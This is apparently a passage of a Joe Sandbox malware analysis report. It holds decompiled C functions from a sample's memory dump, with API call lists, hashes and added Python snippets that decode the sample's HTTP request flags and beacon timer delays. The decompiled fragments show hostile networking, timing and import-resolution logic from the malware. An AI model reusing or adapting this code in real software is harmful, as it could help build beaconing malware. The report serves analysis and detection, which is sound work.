            • lstrlen.KERNEL32(?,00000008,74654D40), ref: 047E7B95
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 047E7BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 047E7BE0
            • InternetSetStatusCallback.WININET(00000000,047E7B18), ref: 047E7BF7
            • ResetEvent.KERNEL32(?), ref: 047E7C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 047E7C1C
            • GetLastError.KERNEL32 ref: 047E7C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 047E7C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 047E7C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 047E7CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 047E7CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 047E7CCA
            • GetLastError.KERNEL32 ref: 047E7CD4
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID: @MetNet
            • API String ID: 2290446683-2109406137
            • Opcode ID: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
            • Instruction ID: fb46a3ce5353d8b59b7767c103e1abd918dc5c2d5ed9f3186bbd84186ac4679a
            • Opcode Fuzzy Hash: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
            • Instruction Fuzzy Hash: 6D417FB1500604BFDB359F67DD88EAB7BBDEB4C704B104A18F602D5290E735AA45DB20
            Uniqueness

            Uniqueness Score: -1.00%
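The WinINet constants in E047E7B83 decoded (an added example for this report, not code from the sample; the names and values are taken from wininet.h and winerror.h). The listing only shows raw numbers: 0x10000000 to InternetOpenA, port 0x50 and service 3 to InternetConnectA, 0x3e5 as the accepted GetLastError value, 0x84404000 to HttpOpenRequestA, option 0x1f queried and re-set with 0x100 OR-ed in, and options 6 and 5 set to 0xea60. The defaults of `summarize_request_setup` are exactly those values; pass others to decode a different sample.

```python
# wininet.h values that appear as raw numbers in the listing.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
}
INTERNET_OPTIONS = {
    0x05: "INTERNET_OPTION_SEND_TIMEOUT",
    0x06: "INTERNET_OPTION_RECEIVE_TIMEOUT",
    0x1F: "INTERNET_OPTION_SECURITY_FLAGS",
}
SECURITY_FLAGS = {
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
}
INTERNET_SERVICE = {3: "INTERNET_SERVICE_HTTP"}
WIN32_ERRORS = {0x3E5: "ERROR_IO_PENDING"}
INTERNET_INVALID_STATUS_CALLBACK = 0xFFFFFFFF  # failure value checked after InternetSetStatusCallback

def decode_mask(value, table):
    """Split a bitmask into the names in `table`; leftover bits come back as hex."""
    names, rest = [], value
    for bit in sorted(table, reverse=True):
        if rest & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08x}")
    return names

def uses_tls(request_flags):
    """INTERNET_FLAG_SECURE is what makes HttpOpenRequestA speak HTTPS."""
    return "INTERNET_FLAG_SECURE" in decode_mask(request_flags, INTERNET_FLAGS)

def relaxes_cert_checks(security_flags):
    """Any SECURITY_FLAG_IGNORE_* bit OR-ed into INTERNET_OPTION_SECURITY_FLAGS
    suppresses a certificate error; only the bit seen in the listing is tabled."""
    return any(n.startswith("SECURITY_FLAG_IGNORE_")
               for n in decode_mask(security_flags, SECURITY_FLAGS))

def summarize_request_setup(open_flags=0x10000000, port=0x50, service=3,
                            request_flags=0x84404000, security_flags_added=0x100,
                            timeout_ms=0xEA60):
    """Decode the argument values E047E7B83 passes, in call order."""
    return {
        "InternetOpenA.dwFlags": decode_mask(open_flags, INTERNET_FLAGS),
        "InternetSetStatusCallback.failure_value": INTERNET_INVALID_STATUS_CALLBACK,
        "InternetConnectA.nServerPort": port,
        "InternetConnectA.dwService": INTERNET_SERVICE.get(service, hex(service)),
        "InternetConnectA.accepted_error": WIN32_ERRORS[0x3E5],
        "HttpOpenRequestA.dwFlags": decode_mask(request_flags, INTERNET_FLAGS),
        "INTERNET_OPTION_SECURITY_FLAGS.or_in": decode_mask(security_flags_added, SECURITY_FLAGS),
        "timeouts_ms": {INTERNET_OPTIONS[6]: timeout_ms, INTERNET_OPTIONS[5]: timeout_ms},
        "plain_http_request": not uses_tls(request_flags),
        "cert_checks_relaxed": relaxes_cert_checks(security_flags_added),
    }

if __name__ == "__main__":
    for key, value in summarize_request_setup().items():
        print(f"{key}: {value}")
```

Two things fall out of the decode. The request is asynchronous (ERROR_IO_PENDING is treated as success and the code waits on the event at `_t65 + 0x1c`), and it is opened without INTERNET_FLAG_SECURE against port 80, so SECURITY_FLAG_IGNORE_UNKNOWN_CA does nothing for the first exchange; it matters because INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS lets WinINet follow an HTTP-to-HTTPS redirect transparently, and a certificate from an unknown CA would then be accepted. The query-then-OR sequence on option 0x1f (InternetQueryOptionA followed by InternetSetOptionA with 0x100 added) is a usable hunting pattern in API traces.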

            Control-flow Graph

            Legend: executed / not executed (rendered graph not reproduced). Basic blocks from the graph source: 47e6815-47e6847 (memset, CreateWaitableTimerA), 47e684d-47e68a6 (_allmul, SetWaitableTimer, WaitForMultipleObjects), 47e68b1 (call 47e5251), 47e68e0-47e690d (call 47e35d2), 47e691c-47e692c (call 47e69e6), 47e6951-47e695b (CloseHandle), 47e696c-47e697f (call 47e63f6), 47e698f-47e69bd (_allmul, SetWaitableTimer, WaitForMultipleObjects), exit 47e69d2-47e69dc.
            C-Code - Quality: 83%
            			E047E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				void _v48;
            				long _v52;
            				struct %anon52 _v60;
            				char _v72;
            				long _v76;
            				void* _v80;
            				union _LARGE_INTEGER _v84;
            				struct %anon52 _v92;
            				void* _v96;
            				void* _v100;
            				union _LARGE_INTEGER _v104;
            				long _v108;
            				struct %anon52 _v124;
            				long _v128;
            				struct %anon52 _t46;
            				void* _t51;
            				long _t53;
            				void* _t54;
            				struct %anon52 _t61;
            				long _t65;
            				struct %anon52 _t66;
            				void* _t69;
            				void* _t73;
            				signed int _t74;
            				void* _t76;
            				void* _t78;
            				void** _t82;
            				signed int _t86;
            				void* _t89;
            
            				_t76 = __edx;
            				_v52 = 0;
            				memset( &_v48, 0, 0x2c);
            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
            				_t46 = CreateWaitableTimerA(0, 1, 0);
            				_v60 = _t46;
            				if(_t46 == 0) {
            					_v92.HighPart = GetLastError();
            				} else {
            					_push(0xffffffff);
            					_push(0xff676980);
            					_push(0);
            					_push( *0x47ea2e0);
            					_v76 = 0;
            					_v80 = 0;
            					L047E82DA();
            					_v84.LowPart = _t46;
            					_v80 = _t76;
            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
            					_t51 =  *0x47ea30c; // 0x1ac
            					_v76 = _t51;
            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
            					_v108 = _t53;
            					if(_t53 == 0) {
            						if(_a8 != 0) {
            							L4:
            							 *0x47ea2ec = 5;
            						} else {
            							_t69 = E047E5251(_t76); // executed
            							if(_t69 != 0) {
            								goto L4;
            							}
            						}
            						_v104.LowPart = 0;
            						L6:
            						L6:
            						if(_v104.LowPart == 1 && ( *0x47ea300 & 0x00000001) == 0) {
            							_v104.LowPart = 2;
            						}
            						_t74 = _v104.LowPart;
            						_t58 = _t74 << 4;
            						_t78 = _t89 + (_t74 << 4) + 0x38;
            						_t75 = _t74 + 1;
            						_v92.LowPart = _t74 + 1;
            						_t61 = E047E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100);
            						_v124 = _t61;
            						if(_t61 != 0) {
            							goto L17;
            						}
            						_t66 = _v92;
            						_v104.LowPart = _t66;
            						if(_t66 != 3) {
            							goto L6;
            						} else {
            							_v124.HighPart = E047E69E6(_t75,  &_v72, _a4, _a8);
            						}
            						goto L12;
            						L17:
            						__eflags = _t61 - 0x10d2;
            						if(_t61 != 0x10d2) {
            							_push(0xffffffff);
            							_push(0xff676980);
            							_push(0);
            							_push( *0x47ea2e4);
            							goto L21;
            						} else {
            							__eflags =  *0x47ea2e8; // 0x0
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								_t61 = E047E63F6();
            								_push(0xffffffff);
            								_push(0xdc3cba00);
            								_push(0);
            								_push( *0x47ea2e8);
            								L21:
            								L047E82DA();
            								_v104.LowPart = _t61;
            								_v100 = _t78;
            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
            								_v128 = _t65;
            								__eflags = _t65;
            								if(_t65 == 0) {
            									goto L6;
            								} else {
            									goto L12;
            								}
            							}
            						}
            						L25:
            					}
            					L12:
            					_t82 =  &_v72;
            					_t73 = 3;
            					do {
            						_t54 =  *_t82;
            						if(_t54 != 0) {
            							HeapFree( *0x47ea2d8, 0, _t54);
            						}
            						_t82 =  &(_t82[4]);
            						_t73 = _t73 - 1;
            					} while (_t73 != 0);
            					CloseHandle(_v80);
            				}
            				return _v92.HighPart;
            				goto L25;
            			}

            Instruction addresses: 0x047e6815 - 0x047e69dc (the report's per-statement address column is not reproduced)

            APIs
            • memset.NTDLL ref: 047E682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047E683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047E6863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 047E6883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,047E26E9,?), ref: 047E689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000), ref: 047E6945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E6955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047E698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 047E69A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047E69B5
              • Part of subcall function 047E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
              • Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
              • Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E69C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3521023985-1616585941
            • Opcode ID: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
            • Instruction ID: b76c1fb2a227ab3a9b861077995a14dc9bdaa664c1dcdeb609bf56433341c7d2
            • Opcode Fuzzy Hash: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
            • Instruction Fuzzy Hash: 5F517DB1508310AFD711AF12CC449ABBBECEB8C324F808B1EF5A5D6290D734A944CF92
            Uniqueness

            Uniqueness Score: -1.00%
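Working out what the waitable-timer arithmetic in E047E6815 sleeps for (an added example, not code from the sample). The listing pushes a 64-bit constant as two dwords (0xff676980 / 0xffffffff on the first path, 0xdc3cba00 / 0xffffffff on the retry path) together with a config dword read from *0x47ea2e0, *0x47ea2e4 or *0x47ea2e8, calls `_allmul`, and hands the 64-bit product to SetWaitableTimer as the due time. A negative due time is relative and counted in 100 ns units. `_allmul` is modelled from its documented semantics (signed 64x64 multiply, low 64 bits returned in edx:eax); the config multipliers used below are assumed, since their values are not on this page.

```python
HUNDRED_NS_PER_SECOND = 10_000_000
MASK64 = (1 << 64) - 1

def allmul(a_lo, a_hi, b_lo, b_hi):
    """Model ntdll!_allmul as called from the listing: two 64-bit operands
    passed as (low, high) dword pairs, 64x64->64 multiply, low 64 bits of
    the product returned as (low, high) dwords, i.e. eax and edx."""
    a = (a_hi << 32) | a_lo
    b = (b_hi << 32) | b_lo
    p = (a * b) & MASK64
    return p & 0xFFFFFFFF, p >> 32

def to_signed64(lo, hi):
    """Interpret an (eax, edx) pair as a signed LARGE_INTEGER."""
    v = (hi << 32) | lo
    return v - (1 << 64) if v >> 63 else v

def unit_seconds(unit_lo, unit_hi=0xFFFFFFFF):
    """Seconds represented by the constant the listing pushes as the second
    operand (e.g. 0xff676980 / 0xffffffff).  It is negative because
    SetWaitableTimer treats a negative due time as relative, in 100 ns units."""
    return -to_signed64(unit_lo, unit_hi) / HUNDRED_NS_PER_SECOND

def due_time_seconds(multiplier, unit_lo, unit_hi=0xFFFFFFFF):
    """Relative wait in seconds for a config multiplier (the dword read from
    *0x47ea2e0 / *0x47ea2e4 / *0x47ea2e8; the value is an assumption here)
    and a unit constant.  Raises if the product is not a relative due time."""
    lo, hi = allmul(multiplier, 0, unit_lo, unit_hi)
    due = to_signed64(lo, hi)
    if due >= 0:
        raise ValueError("product is not negative, so SetWaitableTimer would read it as an absolute time")
    return -due / HUNDRED_NS_PER_SECOND

if __name__ == "__main__":
    print("unit for 0xff676980:", unit_seconds(0xFF676980), "s")
    print("unit for 0xdc3cba00:", unit_seconds(0xDC3CBA00), "s")
    # assumed config values, not read from the sample
    print("first wait with *0x47ea2e0 = 60:", due_time_seconds(60, 0xFF676980), "s")
    print("retry wait with *0x47ea2e8 = 5:", due_time_seconds(5, 0xDC3CBA00), "s")
```

So the first constant is one second per config unit and the retry constant is one minute per config unit. The wait itself is WaitForMultipleObjects on the two-handle array `{timer, *0x47ea30c}`: a result of 0 means the timer fired and the loop continues, while a signal on the second handle falls through to the HeapFree/CloseHandle cleanup at L12.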

            Control-flow Graph

            Legend: executed / not executed (rendered graph not reproduced). Basic blocks from the graph source: 47e7fc5-47e802a (entry), 47e802c-47e8046 (RaiseException), 47e80b8-47e80c5 (LoadLibraryA), 47e80e7-47e8103 (RaiseException), 47e8108-47e8114 (InterlockedExchange), 47e811c-47e8128 (LocalAlloc), 47e813c-47e813d (FreeLibrary), 47e818e-47e819c (GetProcAddress), 47e81be-47e81d6 (RaiseException), exit 47e81fb-47e81ff.
            C-Code - Quality: 51%
            			E047E7FC5(long _a4, long _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				LONG* _v28;
            				long _v40;
            				long _v44;
            				long _v48;
            				CHAR* _v52;
            				long _v56;
            				CHAR* _v60;
            				long _v64;
            				signed int* _v68;
            				char _v72;
            				signed int _t76;
            				signed int _t80;
            				signed int _t81;
            				intOrPtr* _t82;
            				intOrPtr* _t83;
            				intOrPtr* _t85;
            				intOrPtr* _t90;
            				intOrPtr* _t95;
            				intOrPtr* _t98;
            				struct HINSTANCE__* _t99;
            				void* _t102;
            				intOrPtr* _t104;
            				void* _t115;
            				long _t116;
            				void _t125;
            				void* _t131;
            				signed short _t133;
            				struct HINSTANCE__* _t138;
            				signed int* _t139;
            
            				_t139 = _a4;
            				_v28 = _t139[2] + 0x47e0000;
            				_t115 = _t139[3] + 0x47e0000;
            				_t131 = _t139[4] + 0x47e0000;
            				_v8 = _t139[7];
            				_v60 = _t139[1] + 0x47e0000;
            				_v16 = _t139[5] + 0x47e0000;
            				_v64 = _a8;
            				_v72 = 0x24;
            				_v68 = _t139;
            				_v56 = 0;
            				asm("stosd");
            				_v48 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				if(( *_t139 & 0x00000001) == 0) {
            					_a8 =  &_v72;
            					RaiseException(0xc06d0057, 0, 1,  &_a8);
            					return 0;
            				}
            				_t138 =  *_v28;
            				_t76 = _a8 - _t115 >> 2 << 2;
            				_t133 =  *(_t131 + _t76);
            				_a4 = _t76;
            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
            				_v56 = _t80;
            				_t81 = _t133 + 0x47e0002;
            				if(_t80 == 0) {
            					_t81 = _t133 & 0x0000ffff;
            				}
            				_v52 = _t81;
            				_t82 =  *0x47ea1c0; // 0x0
            				_t116 = 0;
            				if(_t82 == 0) {
            					L6:
            					if(_t138 != 0) {
            						L18:
            						_t83 =  *0x47ea1c0; // 0x0
            						_v48 = _t138;
            						if(_t83 != 0) {
            							_t116 =  *_t83(2,  &_v72);
            						}
            						if(_t116 != 0) {
            							L32:
            							 *_a8 = _t116;
            							L33:
            							_t85 =  *0x47ea1c0; // 0x0
            							if(_t85 != 0) {
            								_v40 = _v40 & 0x00000000;
            								_v48 = _t138;
            								_v44 = _t116;
            								 *_t85(5,  &_v72);
            							}
            							return _t116;
            						} else {
            							if(_t139[5] == _t116 || _t139[7] == _t116) {
            								L27:
            								_t116 = GetProcAddress(_t138, _v52);
            								if(_t116 == 0) {
            									_v40 = GetLastError();
            									_t90 =  *0x47ea1bc; // 0x0
            									if(_t90 != 0) {
            										_t116 =  *_t90(4,  &_v72);
            									}
            									if(_t116 == 0) {
            										_a4 =  &_v72;
            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
            										_t116 = _v44;
            									}
            								}
            								goto L32;
            							} else {
            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
            									_t116 =  *(_a4 + _v16);
            									if(_t116 != 0) {
            										goto L32;
            									}
            								}
            								goto L27;
            							}
            						}
            					}
            					_t98 =  *0x47ea1c0; // 0x0
            					if(_t98 == 0) {
            						L9:
            						_t99 = LoadLibraryA(_v60); // executed
            						_t138 = _t99;
            						if(_t138 != 0) {
            							L13:
            							if(InterlockedExchange(_v28, _t138) == _t138) {
            								FreeLibrary(_t138);
            							} else {
            								if(_t139[6] != 0) {
            									_t102 = LocalAlloc(0x40, 8);
            									if(_t102 != 0) {
            										 *(_t102 + 4) = _t139;
            										_t125 =  *0x47ea1b8; // 0x0
            										 *_t102 = _t125;
            										 *0x47ea1b8 = _t102;
            									}
            								}
            							}
            							goto L18;
            						}
            						_v40 = GetLastError();
            						_t104 =  *0x47ea1bc; // 0x0
            						if(_t104 == 0) {
            							L12:
            							_a8 =  &_v72;
            							RaiseException(0xc06d007e, 0, 1,  &_a8);
            							return _v44;
            						}
            						_t138 =  *_t104(3,  &_v72);
            						if(_t138 != 0) {
            							goto L13;
            						}
            						goto L12;
            					}
            					_t138 =  *_t98(1,  &_v72);
            					if(_t138 != 0) {
            						goto L13;
            					}
            					goto L9;
            				}
            				_t116 =  *_t82(0,  &_v72);
            				if(_t116 != 0) {
            					goto L33;
            				}
            				goto L6;
            			}

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047E803E
            • LoadLibraryA.KERNELBASE(?), ref: 047E80BB
            • GetLastError.KERNEL32 ref: 047E80C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047E80FA
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $$@MetNet
            • API String ID: 948315288-3365357938
            • Opcode ID: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
            • Instruction ID: 99e27ecaa453245e2f1b66061341b72ab893e12edb4d3351adbcd5ee65d53a59
            • Opcode Fuzzy Hash: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
            • Instruction Fuzzy Hash: B98109B1A00605AFDB10DF9AD884BAAB7F5FB4C310F15862DE905EB340E775EA05CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 225 414000-414484 VirtualProtect
            APIs
            • VirtualProtect.KERNELBASE(02B53AE0,02B53FFC,00000040), ref: 0041447C
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($mn@$oQZ$kiu
            • API String ID: 544645111-1792616812
            • Opcode ID: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
            • Instruction ID: 72e014972078c534ab087c231bb10598d054eb390f010d6b2350a8619cf21a67
            • Opcode Fuzzy Hash: 3a72a6586edd0f9ec55298982242bba0f0d13a2d0595b106cf83eff69309ef5f
            • Instruction Fuzzy Hash: C6B1FBB56093809FC254CF6AD18960AFBF0FB94744F94990CB9A59B620D3B4C985CF4B
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E047E415A(intOrPtr __edx, void** _a4, void** _a8) {
            				intOrPtr _v8;
            				struct _FILETIME* _v12;
            				short _v56;
            				struct _FILETIME* _t12;
            				intOrPtr _t13;
            				void* _t17;
            				void* _t21;
            				intOrPtr _t27;
            				long _t28;
            				void* _t30;
            
            				_t27 = __edx;
            				_t12 =  &_v12;
            				GetSystemTimeAsFileTime(_t12);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v8);
            				_push(_v12);
            				L047E82D4();
            				_push(_t12);
            				_v12 = _t12;
            				_t13 =  *0x47ea348; // 0xc3d5a8
            				_t5 = _t13 + 0x47eb7b4; // 0x5428d5c
            				_t6 = _t13 + 0x47eb644; // 0x530025
            				_push(0x16);
            				_push( &_v56);
            				_v8 = _t27;
            				L047E7F3A();
            				_t17 = CreateFileMappingW(0xffffffff, 0x47ea34c, 4, 0, 0x1000,  &_v56); // executed
            				_t30 = _t17;
            				if(_t30 == 0) {
            					_t28 = GetLastError();
            				} else {
            					if(GetLastError() == 0xb7) {
            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            						if(_t21 == 0) {
            							_t28 = GetLastError();
            							if(_t28 != 0) {
            								goto L6;
            							}
            						} else {
            							 *_a4 = _t30;
            							 *_a8 = _t21;
            							_t28 = 0;
            						}
            					} else {
            						_t28 = 2;
            						L6:
            						CloseHandle(_t30);
            					}
            				}
            				return _t28;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?,?), ref: 047E4166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047E417C
            • _snwprintf.NTDLL ref: 047E41A1
            • CreateFileMappingW.KERNELBASE(000000FF,047EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 047E41BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E41CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 047E41E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53), ref: 047E4207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047E25B1,?,?,4D283A53,?), ref: 047E420F
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID: @MetNet
            • API String ID: 1814172918-2109406137
            • Opcode ID: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
            • Instruction ID: 5103fd7b6b5ab0f2ccf0a40c747d932e76e30136e016dd97ba84d0476d6123d0
            • Opcode Fuzzy Hash: 722e6e4dac43c6dd5255933829ba9ebfb9a2127de39d544b1ad15342a309bfcb
            • Instruction Fuzzy Hash: E12193F2640214BBDB21EB6ACD05FEE37B9EB8C754F114221F605EB391D674A9058B50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 93%
            			E047E4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
            				void* _t17;
            				void* _t18;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            				intOrPtr _t24;
            				void* _t37;
            				void* _t41;
            				intOrPtr* _t45;
            
            				_t41 = __edi;
            				_t37 = __ebx;
            				_t45 = __eax;
            				_t16 =  *((intOrPtr*)(__eax + 0x20));
            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
            					E047E16B2(_t16, __ecx, 0xea60);
            				}
            				_t17 =  *(_t45 + 0x18);
            				_push(_t37);
            				_push(_t41);
            				if(_t17 != 0) {
            					InternetSetStatusCallback(_t17, 0);
            					InternetCloseHandle( *(_t45 + 0x18)); // executed
            				}
            				_t18 =  *(_t45 + 0x14);
            				if(_t18 != 0) {
            					InternetSetStatusCallback(_t18, 0);
            					InternetCloseHandle( *(_t45 + 0x14));
            				}
            				_t19 =  *(_t45 + 0x10);
            				if(_t19 != 0) {
            					InternetSetStatusCallback(_t19, 0);
            					InternetCloseHandle( *(_t45 + 0x10));
            				}
            				_t20 =  *(_t45 + 0x1c);
            				if(_t20 != 0) {
            					CloseHandle(_t20);
            				}
            				_t21 =  *(_t45 + 0x20);
            				if(_t21 != 0) {
            					CloseHandle(_t21);
            				}
            				_t22 =  *((intOrPtr*)(_t45 + 8));
            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
            					E047E61DA(_t22);
            					 *((intOrPtr*)(_t45 + 8)) = 0;
            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
            				}
            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
            					E047E61DA(_t23);
            				}
            				_t24 =  *_t45;
            				if(_t24 != 0) {
            					_t24 = E047E61DA(_t24);
            				}
            				_t46 =  *((intOrPtr*)(_t45 + 4));
            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
            					return E047E61DA(_t46);
            				}
            				return _t24;
            			}

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C15
            • InternetCloseHandle.WININET(?), ref: 047E4C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C25
            • InternetCloseHandle.WININET(?), ref: 047E4C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 047E4C35
